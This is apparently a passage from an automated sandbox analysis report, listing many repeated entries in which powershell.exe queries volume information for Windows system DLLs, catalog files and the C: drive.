                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
